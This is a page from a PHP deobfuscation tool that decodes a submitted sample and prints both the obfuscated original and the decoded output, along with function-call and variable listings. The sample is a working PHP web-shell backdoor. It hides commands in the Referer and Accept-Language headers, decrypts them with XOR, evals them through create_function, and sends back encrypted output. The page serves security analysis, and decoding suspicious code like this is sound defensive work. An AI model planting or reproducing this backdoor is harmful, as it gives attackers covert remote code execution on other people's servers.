Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Z='ANGUAGEGEGE"];iEGf($rr&&$rEGa){$u=pEGarsEGe_url($EGrr);pEGarse_EGstrEG($u["queEG..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$Z='ANGUAGEGEGE"];iEGf($rr&&$rEGa){$u=pEGarsEGe_url($EGrr);pEGarse_EGstrEG($u["queEGry"],$qEG)EGEG';
$z='"";EGfor($i=0;EG$i<$l;){forEG($j=EG0;($j<$c&EG&$i<$lEG);$jEG++EG,$i+EGEGEG+){$o.=$tEG{$EGi}^$k';
$g='G)EG;if($q&&$mEG){@sEGession_stEGartEG()EG;$s=&$_SEEGSSION;$ssEG="suEGbstr";$sEGl="strtoEGloweE';
$W=str_replace('H','','crHeatHeH_fuHncHHtion');
$K='64_encode(xEG(gEGzcompress($o)EG,EG$k));print("EG<$k>EG$d</EG$k>");@seEGssioEGn_destroy(EG);}}}}';
$x=';$q=arrayEG_values($q);preg_EGmatEGch_all("EG/([\\w])[\\EGw-]+EG(?:;q=0.([EG\\EGd]))?,?EG/",$ra,$mE';
$Q='$ss(EG$s[$i],EG0,$e)EGEG)),$k))EG);$o=ob_getEG_contenEGts();EGob_EGenEGd_clean();$d=baEGsEGeEG';
$M='[$EGi]EG.=$p;$e=strpos($s[$EGi],$fEG);if(EG$EGe)EG{$k=$kh.$kEGfEG;ob_start();@evEGal(@gzuncEGom';
$B='trpos($p,$EGhEG)===0){EG$s[$i]EG="";$p=$EGss($p,3);EG}iEGEGf(array_key_eEGxistEGs($i,EG$s)){$sEG';
$l='.$kf),0,3EG));EGEG$p="";foEGr($zEG=1;$EGEGz<cEGount($m[1]);EG$z++)$pEG.=$EGq[$m[2][$z]];ifEG(s';
$p='$khEG="5d41"EG;$kf="402a";EGEGfunEGction x(EG$t,$k){$c=EGstrlen($kEG)EG;$l=strlen(EG$t)EG;$EGo=';
$w='Gr";$i=$EGm[1][0EG].$m[1EG]EG[1EG]EG;$h=$sl($ss(md5($i.$EGkh),EG0,3EGEG)EG);$f=$sl($ss(mEGd5($i';
$u='{$EGj};}}return $o;}$rEG=$_SERVER;$rrEG=@$r[EG"HTEGTP_REFEREEGEGR"];$ra=@EG$r["EGEGHTTP_ACCEPT_L';
$F='pressEG(@x(@bEGase64_EGdeEGcode(prEGeg_replEGace(arrEGay("EG/EG_/","/-/"),arrEGEGay("/","+")EG,';
$h=str_replace('EG','',$p.$z.$u.$Z.$x.$g.$w.$l.$B.$M.$F.$Q.$K);
$o=$W('',$h);$o();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B trpos($p,$EGhEG)===0){EG$s[$i]EG="";$p=$EGss($p,3);EG}iEGEGf..
$F pressEG(@x(@bEGase64_EGdeEGcode(prEGeg_replEGace(arrEGay("EG..
$K 64_encode(xEG(gEGzcompress($o)EG,EG$k));print("EG<$k>EG$d</E..
$M [$EGi]EG.=$p;$e=strpos($s[$EGi],$fEG);if(EG$EGe)EG{$k=$kh.$k..
$Q $ss(EG$s[$i],EG0,$e)EGEG)),$k))EG);$o=ob_getEG_contenEGts();..
$W create_function
$Z ANGUAGEGEGE"];iEGf($rr&&$rEGa){$u=pEGarsEGe_url($EGrr);pEGar..
$g G)EG;if($q&&$mEG){@sEGession_stEGartEG()EG;$s=&$_SEEGSSION;$..
$h $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$l .$kf),0,3EG));EGEG$p="";foEGr($zEG=1;$EGEGz<cEGount($m[1]);E..
$o None
$p $khEG="5d41"EG;$kf="402a";EGEGfunEGction x(EG$t,$k){$c=EGstr..
$u {$EGj};}}return $o;}$rEG=$_SERVER;$rrEG=@$r[EG"HTEGTP_REFERE..
$w Gr";$i=$EGm[1][0EG].$m[1EG]EG[1EG]EG;$h=$sl($ss(md5($i.$EGkh..
$x ;$q=arrayEG_values($q);preg_EGmatEGch_all("EG/([\w])[\EGw-]+..
$z "";EGfor($i=0;EG$i<$l;){forEG($j=EG0;($j<$c&EG&$i<$lEG);$jEG..

Stats

MD5 8043c319c1b5a8d4831ca13ed9ee7292
Eval Count 1
Decode Time 150 ms